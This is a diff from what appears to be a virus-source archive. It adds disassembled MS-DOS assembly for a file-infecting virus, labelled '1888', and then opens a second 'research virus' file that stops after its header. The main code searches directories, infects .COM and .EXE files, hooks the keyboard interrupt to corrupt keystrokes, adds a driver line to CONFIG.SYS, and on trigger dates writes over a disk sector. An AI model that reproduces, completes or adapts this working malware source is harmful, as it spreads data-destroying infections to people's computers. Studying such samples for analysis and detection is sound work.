+ db 1Ah
+data_05EE db 0FFh
+ db 0FFh,0FFh,0FFh, 40h,0C8h, 16h
+ db 00h, 21h, 00h
+ db 'hgt42 '
+ db 00h, 00h, 00h, 00h, 2Eh, 89h
+ db 1Eh, 12h, 00h, 2Eh, 8Ch, 06h
+ db 14h, 00h,0CBh, 1Eh, 06h, 0Eh
+ db 1Fh,0C4h, 3Eh, 12h, 00h, 26h
+ db 8Ah, 45h, 02h, 3Ch, 00h, 75h
+ db 03h,0E8h, 82h, 00h
+ db 0Dh, 00h, 10h, 26h, 89h, 45h
+ db 03h, 07h, 1Fh,0CBh, 50h, 53h
+ db 51h, 1Eh
+ db 0E4h, 60h,0A8h, 80h, 75h, 30h
+ db 2Eh, 8Bh, 1Eh,0A9h, 00h, 3Ah
+ db 0C7h, 75h, 27h,0B8h, 40h, 00h
+ db 8Eh,0D8h,0E8h, 28h, 00h, 25h
+ db 05h, 00h, 8Bh,0C8h
+ db 0BBh, 1Ch, 00h
+
+locloop_064F:
+ mov ax,cs:data_00A9_e
+ mov [bx],ax
+ add bx,2
+ cmp bx,3Fh
+ jb loc_0660 ; Jump if below
+ mov bx,1Eh
+loc_0660:
+ mov word ptr ds:[1Ch],bx
+ loop locloop_064F ; Loop if cx > 0
+
+loc_0666:
+ pop ds
+ pop cx
+ pop bx
+ pop ax
+ jmp dword ptr cs:data_00A3_e
+
+;
+; SUBROUTINE
+;
+
+sub_066F proc near
+ mov ax,cs:data_00A7_e
+ push ax
+ and ah,0B4h
+ pop ax
+ jp loc_067B ; Jump if parity=1
+ stc ; Set carry flag
+loc_067B:
+ rcl ax,1 ; Rotate thru carry
+ mov cs:data_00A7_e,ax
+ retn
+sub_066F endp
+
+ db 'hgt42 '
+ db 00h, 56h, 31h, 00h, 46h, 52h
+ db 44h, 00h, 00h, 00h, 00h, 00h
+ 
db 00h, 65h, 12h, 65h, 73h, 74h + db 6Eh, 12h, 1Fh, 14h, 31h,0CDh + db 0ABh,0EFh + db 06h, 57h,0B4h, 2Ah,0CDh, 21h + db 8Ah,0E6h, 3Bh, 0Eh,0B3h, 00h + db 74h, 03h, 80h,0C4h + db 0Ch +loc_06B5: + sub ah,ds:data_00B5_e + cmp ah,3 + jb loc_06FB ; Jump if below + mov ds:data_00B5_e,dh + mov ds:data_00B3_e,cx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov ds:data_00A7_e,dx + call sub_066F + mov bx,ax + and bx,3 + nop ;*ASM fixup - sign extn byte + mov al,ds:data_00AB_e[bx] + mov ah,ds:data_00AF_e[bx] + mov ds:data_00A9_e,ax + mov ax,3516h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_00A3_e,bx + mov bx,es + mov word ptr ds:data_00A3_e+2,bx + cli ; Disable interrupts +;* mov dx,offset loc_003E ;* + db 0BAh, 3Eh, 00h + mov ax,2516h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + sti ; Enable interrupts +loc_06FB: + pop di + pop es + mov word ptr es:[di+0Eh],0B6h + mov es:[di+10h],cs + xor ax,ax ; Zero register + retn +data_070A dw 11Ch +data_070C db 8Bh + db 1Eh, 28h, 01h,0A1h, 26h, 01h + db 8Eh,0D0h, 8Bh, 26h, 24h, 01h + dw 0EC83h, 8B04h + dw 80F4h, 1F3Eh + dw 1, 2875h + dw 0BFh, 3601h + dw 3C89h, 0FB8Bh + dw 8936h, 27Ch + dw 0FF33h, 8936h + dw 47Ch, 0BFh + dw 8B01h, 2236h + dw 301h, 8BF7h + dw 1C0Eh, 8C01h + dw 8ED8h, 0F3C0h + dw 0EBA4h, 9016h + db 8Bh,0FBh, 83h,0C7h, 10h,0A1h + db 16h, 00h, 03h,0F8h, 36h, 89h + db 7Ch, 02h, 8Bh, 3Eh, 14h, 00h + db 36h, 89h + db 3Ch + db 8Eh,0DBh, 8Eh,0C3h,0CBh +loc_0767: + mov ax,ss + mov cs:data_0126,ax + mov cs:data_0124,sp + mov ax,cs + mov ss,ax + mov sp,1F7h + push ds + mov ds,ax + pop ax + mov data_0128,ax + call sub_0269 + mov ax,cs + mov es,ax + call sub_01F7 + mov dx,offset data_019D + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + call sub_02AF + call sub_02A5 + jnc loc_079C ; Jump if carry=0 + jmp loc_083A +loc_079C: + call sub_0227 + jc loc_07A4 ; Jump if carry 
Set + jmp loc_083A +loc_07A4: + call sub_023A + call sub_02D0 + mov data_011E,0 +loc_07AF: + call sub_0355 + jc loc_0800 ; Jump if carry Set +loc_07B4: + cmp data_019C,4 + ja loc_083A ; Jump if above + call sub_036C + call sub_034D + jnc loc_07FA ; Jump if carry=0 + cmp data_010A,4 + ja loc_07FA ; Jump if above + call sub_03A6 + jc loc_083A ; Jump if carry Set + cmp data_011E,0 + je loc_07DB ; Jump if equal + call sub_03BB + jmp short loc_07DE +loc_07DB: + call sub_0472 +loc_07DE: + call sub_037D + jc loc_083A ; Jump if carry Set + inc data_019C + cmp data_019B,1 + je loc_07FA ; Jump if equal + call sub_04DE + jz loc_07FA ; Jump if zero + call sub_0525 + jc loc_083A ; Jump if carry Set + jmp short loc_07AF +loc_07FA: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_07B4 ; Jump if carry=0 +loc_0800: + cmp data_011E,1 + je loc_080E ; Jump if equal + mov data_011E,1 + jmp short loc_07AF +loc_080E: + mov data_011E,0 + cmp data_019A,0 + jne loc_0829 ; Jump if not equal + lea dx,data_015A ; ('C:\') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov data_019A,0FFh + jmp short loc_07AF +loc_0829: + cmp data_0182,0 + je loc_083A ; Jump if equal + call sub_0328 + dec data_0182 + jmp loc_07AF +loc_083A: + lea dx,data_013A ; ('\DANGER\1888') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + call sub_04DE + jz loc_084A ; Jump if zero + call sub_04EE +loc_084A: + mov ax,word ptr data_012C+2 + mov es,ax + mov cx,5Bh + mov si,offset data_070C + xor di,di ; Zero register + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + call sub_028C + call data_012C + int 20h ; DOS program terminate + db 0E9h, 64h, 06h, 20h,0A4h, 86h + db 0FCh, 18h, 02h, 00h, 00h, 00h + db 31h, 2Eh, 43h, 4Fh, 4Dh, 00h + db 20h, 20h, 4Dh, 00h, 00h, 00h + db 0A6h, 24h, 00h, 00h, 60h, 07h + db 00h, 00h, 60h, 07h, 60h, 07h + db 
0FEh,0FFh, 6Ch, 0Dh, 6Ch, 0Dh + db 94h, 92h, 00h, 00h, 01h, 9Eh + db 0C8h, 07h, 07h, 1Ch, 02h, 10h + db 00h, 00h, 00h, 00h, 5Ch, 00h + db 4Fh, 53h, 53h, 49h, 00h, 45h + db 4Eh, 00h + db 53h, 54h + db 20 dup (0) + db 'C:\', 0 + db '*', 0 + db 'NETWARE', 0 + db 'LMS', 0 + db 'MAUS', 0 + db 'MDB', 0 + db 'DOS', 0 + db 'BASE', 0 + db 'L', 0 + db '`' + db 01h, 00h, 01h, 14h, 17h, 6Eh + db 00h, 01h,0A9h, 00h, 01h,0BFh + db 38h, 2Ah, 2Eh, 65h, 78h, 65h + db 00h, 2Ah, 2Eh, 63h, 6Fh, 6Dh + db 00h, 00h, 00h, 04h, 01h + db 3Fh + db 7 dup (3Fh) + db 43h, 4Fh, 4Dh, 23h, 0Ah, 00h + db 00h, 00h, 31h,0C0h, 50h, 9Ah + db 20h,0A4h, 86h,0FCh, 18h, 02h + db 00h, 00h, 00h, 31h, 2Eh, 43h + db 4Fh, 4Dh, 00h, 20h, 20h, 4Dh + db 00h, 00h, 00h,0A6h,0EAh,0AAh + db 03h, 00h,0CCh,0AAh, 03h, 00h + db 00h, 31h, 31h, 00h, 40h, 48h + db 07h, 00h, 40h, 6Ch, 15h, 6Ch + db 15h, 00h, 40h, 05h, 00h, 60h + db 07h, 00h, 01h,0C8h, 01h, 19h + db 01h, 82h, 08h, 6Ch, 0Dh, 6Ch + db 0Dh,0ADh, 04h, 6Ch, 0Dh, 46h + db 72h,0DEh, 07h + +; +; SUBROUTINE +; + +sub_0959 proc near + cmp data_011C,0 + jne loc_0969 ; Jump if not equal + mov ax,760h + mov data_011C,ax + mov data_0120,ax +loc_0969: + mov al,data_011E + mov data_011F,al + mov ax,data_0120 + mov data_0122,ax + inc data_0119 + mov data_019C,0 + mov data_019A,0 + mov data_019B,0 + retn +sub_0959 endp + + +; +; SUBROUTINE +; + +sub_0989 proc near + lea dx,data_0183 ; Load effective addr + xor al,al ; Zero register + mov ah,3Dh ; '=' + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_099B ; Jump if carry Set + mov bx,ax + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + +loc_ret_099B: + retn +sub_0989 endp + + +; +; SUBROUTINE +; + +sub_099C proc near + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dh=month + ; dl=day, al=day-of-week 0=SUN + mov ah,dh + cmp cx,data_0130 + je loc_09AB ; Jump if equal + add ah,0Ch +loc_09AB: + sub ah,data_0132 + mov 
data_011B,ah + mov data_0134,al + mov data_0133,dl + mov data_0132,dh + mov data_0130,cx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov data_0135,ch + retn +sub_099C endp + + +; +; SUBROUTINE +; + +sub_09CB proc near + mov ax,es + dec ax + push es + mov es,ax + mov ax,es:d_8B38_0003_e + mov data_012A,ax + pop es + mov bx,ax + sub bx,200h + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + mov bx,150h + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov word ptr data_012C+2,ax + retn +sub_09CB endp + + +; +; SUBROUTINE +; + +sub_09EE proc near + push es + mov ax,word ptr data_012C+2 + mov es,ax + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ax,data_0128 + mov es,ax + mov bx,data_012A + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + pop es + retn +sub_09EE endp + + +; +; SUBROUTINE +; + +sub_0A07 proc near + push ds + mov ah,1Bh + int 21h ; DOS Services ah=function 1Bh + ; get disk info, default drive + ; al=sectors per cluster + ; ds:bx=ptr to media ID byte + ; cx=sector size, dx=clusters + cmp byte ptr [bx],0F8h + pop ds + retn +sub_0A07 endp + + +; +; SUBROUTINE +; + +sub_0A11 proc near + lea si,data_019D ; Load effective addr + mov di,si + xor dl,dl ; Zero register + mov ah,47h ; 'G' + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + ; ds:si=ASCIIZ directory name + mov cx,30h + mov al,0 + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov cx,di + sub cx,si + lea di,data_013A ; ('\DANGER\1888') Load effective addr + mov al,5Ch ; '\' + stosb ; Store al to es:[di] + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_0A11 endp + + +; +; SUBROUTINE +; + +sub_0A32 proc near + mov data_0182,0 + lea bx,cs:[160h] ; Load effective addr + add 
bx,20h + mov data_0180,bx + sub bx,20h + lea dx,data_015A+4 ; ('*') Load effective addr + mov cx,33h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_0A81 ; Jump if carry Set +loc_0A52: + lea di,data_019D ; Load effective addr + add di,1Eh + cmp byte ptr [di],2Eh ; '.' + je loc_0A7B ; Jump if equal + mov si,di + mov cx,20h + mov al,0 + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov cx,di + sub cx,si + mov di,bx + add bx,cx + cmp bx,data_0180 + ja loc_0A81 ; Jump if above + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + inc data_0182 +loc_0A7B: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_0A52 ; Jump if carry=0 +loc_0A81: + lea bx,cs:[160h] ; Load effective addr + mov data_0180,bx + retn +sub_0A32 endp + + +; +; SUBROUTINE +; + +sub_0A8A proc near + cmp data_0182,0 + je loc_ret_0AAE ; Jump if equal + lea dx,data_013A ; ('\DANGER\1888') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov dx,data_0180 + mov di,dx + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov al,0 + mov cx,20h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov data_0180,di + +loc_ret_0AAE: + retn +sub_0A8A endp + + +; +; SUBROUTINE +; + +sub_0AAF proc near + mov ax,data_0104 + and al,1Fh + cmp al,1Eh + retn +sub_0AAF endp + + +; +; SUBROUTINE +; + +sub_0AB7 proc near + lea dx,data_0194 ; Load effective addr + cmp data_011E,0 + je loc_0AC6 ; Jump if equal + lea dx,data_018E ; Load effective addr +loc_0AC6: + mov cx,23h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + retn +sub_0AB7 endp + + +; +; SUBROUTINE +; + +sub_0ACE proc near + lea si,data_019D ; Load effective addr + add si,15h + lea di,data_0103 ; Load effective addr + mov cx,16h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_0ACE endp + + +; 
+; SUBROUTINE +; + +sub_0ADF proc near + pushf ; Push flags + mov cx,data_0104 + or cl,1Fh + and cl,0FEh + mov dx,data_0106 + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + lea dx,data_010C ; ('1888.COM') Load effective addr + xor ch,ch ; Zero register + mov cl,data_0103 + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + popf ; Pop flags + retn +sub_0ADF endp + + +; +; SUBROUTINE +; + +sub_0B08 proc near + lea dx,data_010C ; ('1888.COM') Load effective addr + xor cx,cx ; Zero register + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jc loc_ret_0B1C ; Jump if carry Set + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + +loc_ret_0B1C: + retn +sub_0B08 endp + + +; +; SUBROUTINE +; + +sub_0B1D proc near + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + mov cx,100h + xor dx,dx ; Zero register + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cmp word ptr ds:d_9E01_0000_e,5A4Dh + nop ;*ASM fixup - sign extn byte + je loc_0B38 ; Jump if equal + stc ; Set carry flag + jmp loc_0BB7 +loc_0B38: + call sub_0BB9 + push ax + mov ax,di + and ax,0Fh + mov cx,10h + xor dx,dx ; Zero register + sub cx,ax + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jnc loc_0B51 ; Jump if carry=0 + jmp short loc_0BB7 + db 90h +loc_0B51: + mov si,ax + mov cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_0BB7 ; Jump if carry Set + pop dx + mov ax,di + add ax,si + add ax,100h + cmp ax,200h + jb loc_0B6D ; Jump if below + and ax,1FFh + inc dx +loc_0B6D: + mov cl,4 + shr ax,cl ; Shift w/zeros fill + dec dx + mov cl,5 + shl dx,cl ; Shift w/zeros fill + sub dx,ds:d_9E01_0008_e + add ax,dx + sub ax,10h + mov ds:d_9E01_0016_e,ax + mov word ptr ds:d_9E01_0014_e,100h + push ds + mov ax,cs + mov ds,ax + mov cx,data_011C + mov dx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop ds + jc loc_0BB7 ; Jump if carry Set + call sub_0BB9 + mov ds:d_9E01_0002_e,di + mov ds:d_9E01_0004_e,ax + mov ax,4200h + xor dx,dx ; Zero register + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_0BB7 ; Jump if carry Set + mov cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_0BB7: + pop ds + retn +sub_0B1D endp + + +; +; SUBROUTINE +; + +sub_0BB9 proc near + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov di,ax + and di,1FFh + 
mov cl,9 + shr ax,cl ; Shift w/zeros fill + mov cl,7 + shl dx,cl ; Shift w/zeros fill + add ax,dx + inc ax + retn +sub_0BB9 endp + + +; +; SUBROUTINE +; + +sub_0BD4 proc near + mov ax,data_0108 + mov data_0120,ax + mov cx,data_011C + cmp cx,ax + jb loc_0BEA ; Jump if below + mov data_0120,cx + mov cx,data_0108 +loc_0BEA: + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + xor dx,dx ; Zero register + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + pop ds + jc loc_ret_0C3F ; Jump if carry Set + mov ax,4200h + xor dx,dx ; Zero register + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_ret_0C3F ; Jump if carry Set + mov dx,100h + mov cx,data_011C + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_ret_0C3F ; Jump if carry Set + cmp ax,data_0108 + ja loc_0C2E ; Jump if above + mov ax,4200h + mov dx,data_0108 + mov data_0120,dx + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_ret_0C3F ; Jump if carry Set + mov cx,data_011C + jmp short loc_0C32 +loc_0C2E: + mov cx,data_0108 +loc_0C32: + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + xor dx,dx ; Zero register + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop ds + +loc_ret_0C3F: + retn +sub_0BD4 endp + + +; +; SUBROUTINE +; + +sub_0C40 proc near + cmp data_011B,2 + ja loc_0C4A ; Jump if above + xor ax,ax ; Zero register + retn +loc_0C4A: + mov al,data_0133 + and al,1 + retn +sub_0C40 endp + + +; +; SUBROUTINE +; + +sub_0C50 proc near + cmp data_0133,0Fh + jb loc_0C69 ; Jump if below + mov al,data_0135 + cmp al,13h + jb loc_0C69 ; Jump if below + mov ax,40h + mov es,ax + mov byte ptr es:d_0040_004A_e,23h ; '#' 
+loc_0C69: + cmp data_0133,0Dh + jne loc_ret_0C86 ; Jump if not equal + cmp data_0134,5 + jne loc_ret_0C86 ; Jump if not equal + mov ax,301h + mov cx,1 + mov dx,50h + xor bx,bx ; Zero register + mov es,bx + int 13h ; Disk dl=drive ? ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + +loc_ret_0C86: + retn +sub_0C50 endp + + +; +; SUBROUTINE +; + +sub_0C87 proc near + mov data_019B,1 + lea dx,data_05C1 ; Load effective addr + mov cx,27h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jnc loc_0CC6 ; Jump if carry=0 + mov ah,3Ch ; '<' + mov cx,6 + int 21h ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + mov bx,ax + lea dx,data_05EE ; Load effective addr + mov cx,data_070A + mov si,dx + add si,data_00B3_e + mov ax,data_0130 + mov [si],ax + mov ah,data_0132 + mov [si+2],ah + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + jc loc_0D1F ; Jump if carry Set +loc_0CC6: + lea dx,data_05C7 ; ('C:\CONFIG.SYS') Load effective add + mov cx,27h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_0D1F ; Jump if carry Set + call sub_0ACE + xor cx,cx ; Zero register + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + jc loc_0D1F ; Jump if carry Set + mov cx,data_0108 + push es + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + mov es,ax + xor dx,dx ; Zero register + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + pop ds + mov dx,ax + mov ax,0FFFFh + xor di,di ; Zero register + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp ax,es:[di-1] + pop es + jz loc_0D1F ; Jump if zero + mov ax,4200h + xor cx,cx ; Zero register + dec dx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_0D1F ; Jump if carry Set + lea dx,data_05D5 ; ('DEVICE =') Load effective addr + mov cx,19h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_0D1F: + call sub_0ADF + retn +sub_0C87 endp + + inc bx + cmp bl,[si-1] + inc word ptr [bx+si] + inc bx + cmp bl,[si+43h] + dec di + dec si + inc si + dec cx + inc di + db 2Eh, 53h, 59h, 53h, 00h + db 'DEVICE =' + db 0FFh,0FFh + db ' COUNTRY.SYS', 0Dh, 0Ah + db 1Ah,0FFh,0FFh,0FFh,0FFh, 40h + db 0C8h, 16h, 00h, 21h, 00h + db 'hgt42 ' + db 00h, 00h, 00h, 00h, 2Eh, 89h + db 1Eh, 12h, 00h, 2Eh, 8Ch, 06h + db 14h, 00h,0CBh, 1Eh, 06h, 0Eh + db 1Fh,0C4h, 3Eh, 12h, 00h, 26h + db 8Ah, 45h, 02h, 3Ch, 00h, 75h + db 03h,0E8h, 82h, 00h + db 0Dh, 00h, 10h, 26h, 89h, 45h + db 03h, 07h, 1Fh,0CBh, 50h, 53h + db 51h, 1Eh + db 0E4h, 60h,0A8h, 80h, 75h, 30h + db 2Eh, 8Bh, 1Eh,0A9h, 00h, 3Ah + db 0C7h, 75h, 27h,0B8h, 40h, 00h + db 8Eh,0D8h,0E8h, 28h, 00h, 25h + db 05h, 00h, 8Bh,0C8h + db 0BBh, 1Ch, 00h + +locloop_0DB1: + mov ax,cs:data_00A9_e + mov [bx],ax + add bx,2 + cmp bx,3Fh + jb loc_0DC2 ; Jump if below + mov bx,1Eh +loc_0DC2: + mov word ptr ds:[1Ch],bx + loop locloop_0DB1 ; Loop if cx > 0 + +loc_0DC8: + pop ds + pop cx + pop bx + pop ax + jmp dword ptr cs:data_00A3_e + +; +; SUBROUTINE +; + +sub_0DD1 proc near + mov ax,cs:data_00A7_e + push ax + and ah,0B4h + pop ax + jp loc_0DDD ; Jump if parity=1 + stc ; Set carry flag +loc_0DDD: + rcl ax,1 ; Rotate thru carry + mov cs:data_00A7_e,ax + retn +sub_0DD1 endp + + db 'hgt42 ' + db 00h, 56h, 
31h, 00h, 46h, 52h + db 44h, 00h, 00h, 00h, 00h, 00h + db 00h, 65h, 12h, 65h, 73h, 74h + db 6Eh, 12h, 1Fh, 14h, 31h,0CDh + db 0ABh,0EFh + db 06h, 57h,0B4h, 2Ah,0CDh, 21h + db 8Ah,0E6h, 3Bh, 0Eh,0B3h, 00h + db 74h, 03h, 80h,0C4h + db 0Ch +loc_0E17: + sub ah,ds:data_00B5_e + cmp ah,3 + jb loc_0E5D ; Jump if below + mov ds:data_00B5_e,dh + mov ds:data_00B3_e,cx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov ds:data_00A7_e,dx + call sub_0DD1 + mov bx,ax + and bx,3 + nop ;*ASM fixup - sign extn byte + mov al,ds:data_00AB_e[bx] + mov ah,ds:data_00AF_e[bx] + mov ds:data_00A9_e,ax + mov ax,3516h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_00A3_e,bx + mov bx,es + mov word ptr ds:data_00A3_e+2,bx + cli ; Disable interrupts +;* mov dx,offset loc_003E ;* + db 0BAh, 3Eh, 00h + mov ax,2516h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + sti ; Enable interrupts +loc_0E5D: + pop di + pop es + mov word ptr es:[di+0Eh],0B6h + mov es:[di+10h],cs + xor ax,ax ; Zero register + retn + db 1Ch + db 01h, 8Bh, 1Eh, 28h, 01h,0A1h + db 26h, 01h, 8Eh,0D0h, 8Bh, 26h + db 24h, 01h, 83h,0ECh, 04h, 8Bh + db 0F4h, 80h, 3Eh, 1Fh, 01h, 00h + db 75h, 28h,0BFh, 00h, 01h, 36h + db 89h, 3Ch, 8Bh,0FBh, 36h, 89h + db 7Ch, 02h, 33h,0FFh, 36h, 89h + db 7Ch, 04h + db 0BFh, 00h, 01h, 8Bh, 36h, 22h + db 01h, 03h,0F7h, 8Bh, 0Eh, 1Ch + db 01h, 8Ch,0D8h, 8Eh,0C0h,0F3h + db 0A4h,0EBh, 16h, 90h +loc_0EAF: + mov di,bx + add di,10h + mov ax,ds:data_0016_e + add di,ax + mov ss:[si+2],di + mov di,word ptr ds:data_0012_e+2 + mov ss:[si],di +loc_0EC4: + mov ds,bx + mov es,bx + retf ; Return far + db 8Ch,0D0h, 2Eh,0A3h, 26h, 01h + db 2Eh, 89h, 26h, 24h, 01h, 8Ch + db 0C8h, 8Eh,0D0h,0BCh,0F7h, 01h + db 1Eh, 8Eh,0D8h, 58h,0A3h, 28h + db 01h,0E8h,0E6h,0FAh, 8Ch,0C8h + db 8Eh,0C0h,0E8h, 6Dh,0FAh + db 0BAh, 9Dh, 01h,0B4h, 1Ah,0CDh + db 21h,0E8h, 1Bh,0FBh,0E8h, 0Eh + db 0FBh, 73h, 03h,0E9h, 9Eh, 00h 
+loc_0EFE: + call sub_0989 + jc loc_0F06 ; Jump if carry Set + jmp loc_0F9C +loc_0F06: + call sub_099C + call sub_0A32 + mov data_011E,0 +loc_0F11: + call sub_0AB7 + jc loc_0F62 ; Jump if carry Set +loc_0F16: + cmp data_019C,4 + ja loc_0F9C ; Jump if above + call sub_0ACE + call sub_0AAF + jnc loc_0F5C ; Jump if carry=0 + cmp data_010A,4 + ja loc_0F5C ; Jump if above + call sub_0B08 + jc loc_0F9C ; Jump if carry Set + cmp data_011E,0 + je loc_0F3D ; Jump if equal + call sub_0B1D + jmp short loc_0F40 +loc_0F3D: + call sub_0BD4 +loc_0F40: + call sub_0ADF + jc loc_0F9C ; Jump if carry Set + inc data_019C + cmp data_019B,1 + je loc_0F5C ; Jump if equal + call sub_0C40 + jz loc_0F5C ; Jump if zero + call sub_0C87 + jc loc_0F9C ; Jump if carry Set + jmp short loc_0F11 +loc_0F5C: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_0F16 ; Jump if carry=0 +loc_0F62: + cmp data_011E,1 + je loc_0F70 ; Jump if equal + mov data_011E,1 + jmp short loc_0F11 +loc_0F70: + mov data_011E,0 + cmp data_019A,0 + jne loc_0F8B ; Jump if not equal + lea dx,data_015A ; ('C:\') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov data_019A,0FFh + jmp short loc_0F11 +loc_0F8B: + cmp data_0182,0 + je loc_0F9C ; Jump if equal + call sub_0A8A + dec data_0182 + jmp loc_0F11 +loc_0F9C: + lea dx,data_013A ; ('\DANGER\1888') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + call sub_0C40 + jz loc_0FAC ; Jump if zero + call sub_0C50 +loc_0FAC: + mov ax,word ptr data_012C+2 + mov es,ax + mov cx,5Bh + mov si,offset data_070C + xor di,di ; Zero register + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + call sub_09EE + call data_012C + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.189.asm b/MSDOS/Virus.MSDOS.Unknown.189.asm new file mode 100644 index 00000000..46177d13 --- /dev/null 
+++ b/MSDOS/Virus.MSDOS.Unknown.189.asm 
@@ -0,0 +1,152 @@
+;***************************************************************************
+;* *
+;* 196 - Research Virus Version 1.01 Date. 11th April 1992. *
+;* *
+;* Written By : F.Deakin (ACE COMPUTER SYSTEMS) *
+;* *
+;* Non-Overwriting Version of 97 Virus *
+;* *
+;***************************************************************************
+
+CODE Segment
+ Assume CS:CODE
+
+progr equ 100h
+
+ org progr
+
